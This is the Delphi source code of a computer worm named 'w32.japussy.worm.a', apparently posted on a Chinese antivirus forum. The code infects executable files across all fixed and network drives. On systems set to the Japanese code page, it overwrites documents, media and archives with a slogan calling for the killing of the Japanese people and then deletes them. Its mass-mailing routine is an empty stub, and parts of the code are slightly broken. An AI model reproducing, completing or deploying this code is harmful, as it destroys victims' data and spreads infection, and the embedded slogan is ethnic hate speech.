瑞星卡卡安全论坛

program japussy;
uses
windows, sysutils, classes, graphics, shellapi{, registry};
const
headersize = 82432;            iconoffset = $12eb8;         
{
headersize = 38912;           
iconoffset = $92bc;           

//upx 1.24w 用法: upx -9 --8086 japussy.exe
}
iconsize  = $2e8;           
icontail  = iconoffset + iconsize;
id      = $44444444;       

//垃圾码，以备写入
catchword = 'if a race need to be killed out, it must be yamato. ' +
        'if a country need to be destroyed, it must be japan! ' +
        '*** w32.japussy.worm.a ***';
{$r *.res}
function registerserviceprocess(dwprocessid, dwtype: integer): integer; 
stdcall; external 'kernel32.dll';
var
tmpfile: string;
si:    startupinfo;
pi:    process_information;
isjap:  boolean = false;
{ 判断是否为win9x }
function iswin9x: boolean;
var
ver: tosversioninfo;
begin
result := false;
ver.dwosversioninfosize := sizeof(tosversioninfo);
if not getversionex(ver) then
  exit;
if (ver.dwplatformid = ver_platform_win32_windows) then //win9x
  result := true;
end;
{ 在流之间复制 }
procedure copystream(src: tstream; sstartpos: integer; dst: tstream;
dstartpos: integer; count: integer);
var
scurpos, dcurpos: integer;
begin
scurpos := src.position;
dcurpos := dst.position;
src.seek(sstartpos, 0);
dst.seek(dstartpos, 0);
dst.copyfrom(src, count);
src.seek(scurpos, 0);
dst.seek(dcurpos, 0);
end;
{ 将宿主文件从已感染的pe文件中分离出来，以备使用 }
procedure extractfile(filename: string);
var
sstream, dstream: tfilestream;
begin
try
  sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
  try
    dstream := tfilestream.create(filename, fmcreate);
    try
    sstream.seek(headersize, 0);
    dstream.copyfrom(sstream, sstream.size - headersize);
    finally
    dstream.free;
    end;
  finally
    sstream.free;
  end;
except
end;
end;
{ 填充startupinfo结构 }
procedure fillstartupinfo(var si: startupinfo; state: word);
begin
si.cb := sizeof(si);
si.lpreserved := nil;
si.lpdesktop := nil;
si.lptitle := nil;
si.dwflags := startf_useshowwindow;
si.wshowwindow := state;
si.cbreserved2 := 0;
si.lpreserved2 := nil;
end;
{ 发带毒邮件 }
procedure sendmail;
begin
end;
{ 感染pe文件 }
procedure infectonefile(filename: string);
var
hdrstream, srcstream: tfilestream;
icostream, dststream: tmemorystream;
iid: longint;
aicon: ticon;
infected, ispe: boolean;
i: integer;
buf: array[0..1] of char;
begin
try
  if comparetext(filename, 'japussy.exe') = 0 then
    exit;
  infected := false;
  ispe  := false;
srcstream := tfilestream.create(filename, fmopenread);
  try
    for i := 0 to $108 do
    begin
    srcstream.seek(i, sofrombeginning);
    srcstream.read(buf, 2);
    if (buf[0] = #80) and (buf[1] = #69) then //pe标记
    begin
      ispe := true; //是pe文件
      break;
    end;
    end;
    srcstream.seek(-4, sofromend);
    srcstream.read(iid, 4);
    if (iid = id) or (srcstream.size < 10240) then
    infected := true;
  finally
    srcstream.free;
  end;
  if infected or (not ispe) then
    exit;
  icostream := tmemorystream.create;
  dststream := tmemorystream.create;
  try
    aicon := ticon.create;
    try
    aicon.releasehandle;
    aicon.handle := extracticon(hinstance, pchar(filename), 0);
    aicon.savetostream(icostream);
    finally
    aicon.free;
    end;
    srcstream := tfilestream.create(filename, fmopenread);
    hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
    try
    copystream(hdrstream, 0, dststream, 0, iconoffset);
    copystream(icostream, 22, dststream, iconoffset, iconsize);
    copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);
    copystream(srcstream, 0, dststream, headersize, srcstream.size);
    dststream.seek(0, 2);
    iid := $44444444;
    dststream.write(iid, 4);
    finally
    hdrstream.free;
    end;
  finally
    srcstream.free;
    icostream.free;
    dststream.savetofile(filename);
    dststream.free;
  end;
except;
end;
end;
{ 将目标文件写入垃圾码后删除 }
procedure smashfile(filename: string);
var
filehandle: integer;
i, size, mass, max, len: integer;
begin
try
  setfileattributes(pchar(filename), 0);
  filehandle := fileopen(filename, fmopenwrite);
  try
    size := getfilesize(filehandle, nil);
    i := 0;
    randomize;
    max := random(15);
    if max < 5 then
    max := 5;
    mass := size div max;
    len := length(catchword);
    while i < max do
    begin
    fileseek(filehandle, i * mass, 0);
    filewrite(filehandle, catchword, len);
    inc(i);
    end;
  finally
    fileclose(filehandle);
  end;
  deletefile(pchar(filename));
except
end;
end;
{ 获得可写的驱动器列表 }
function getdrives: string;
var
disktype: word;
d: char;
str: string;
i: integer;
begin
for i := 0 to 25 do
begin
  d := chr(i + 65);
  str := d + ':\';
  disktype := getdrivetype(pchar(str));
    if (disktype = drive_fixed) or (disktype = drive_remote) then
    result := result + d;
end;
end;
procedure loopfiles(path, mask: string);
var
i, count: integer;
fn, ext: string;
subdir: tstrings;
searchrec: tsearchrec;
msg: tmsg;
function isvaliddir(searchrec: tsearchrec): integer;
begin
  if (searchrec.attr <> 16) and (searchrec.name <> '.') and
    (searchrec.name <> '..') then
    result := 0 //不是目录
  else if (searchrec.attr = 16) and (searchrec.name <> '.') and
    (searchrec.name <> '..') then
    result := 1 //不是根目录
  else result := 2; //是根目录
end;
begin
if (findfirst(path + mask, faanyfile, searchrec) = 0) then
begin
  repeat
    peekmessage(msg, 0, 0, 0, pm_remove);
    if isvaliddir(searchrec) = 0 then
    begin
    fn := path + searchrec.name;
    ext := uppercase(extractfileext(fn));
    if (ext = '.exe') or (ext = '.scr') then
    begin
      infectonefile(fn); //感染可执行文件     
    end
    else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then
    begin
          end
    else if ext = '.wab' then //outlook地址簿文件
    begin
     
    end
    else if ext = '.adc' then //foxmail地址自动完成文件
    begin
     
    end
    else if ext = 'ind' then //foxmail地址簿文件
    begin
     
    end
    else 
    begin
      if isjap then
      begin
        if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or
        (ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or
        (ext = '.wma') or (ext = '.zip') or (ext = '.rar') or
        (ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or
        (ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or
        (ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then
          smashfile(fn);
      end;
    end;
    end;
        sleep(200);
  until (findnext(searchrec) <> 0);
end;
findclose(searchrec);
subdir := tstringlist.create;
if (findfirst(path + '*.*', fadirectory, searchrec) = 0) then
begin
  repeat
    if isvaliddir(searchrec) = 1 then
    subdir.add(searchrec.name);
  until (findnext(searchrec) <> 0);
  end;
findclose(searchrec);
count := subdir.count - 1;
for i := 0 to count do
  loopfiles(path + subdir.strings + '\', mask);
freeandnil(subdir);
end;
procedure infectfiles;
var
driverlist: string;
i, len: integer;
begin
if getacp = 932 then
  isjap := true;！
driverlist := getdrives;
len := length(driverlist);
while true do
begin
  for i := len downto 1 do
    loopfiles(driverlist + ':\', '*.*');
  sendmail;
  sleep(1000 * 60 * 5);
end;
end;
begin
if iswin9x then //是win9x
  registerserviceprocess(getcurrentprocessid, 1) else //winnt
begin
  end;

if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then
  infectfiles
else
begin
  tmpfile := paramstr(0);
  delete(tmpfile, length(tmpfile) - 4, 4);
  tmpfile := tmpfile + #32 + '.exe';
  extractfile(tmpfile); //分离之
  fillstartupinfo(si, sw_showdefault);
  createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,
    0, nil, '.', si, pi);
  infectfiles;
end;
end.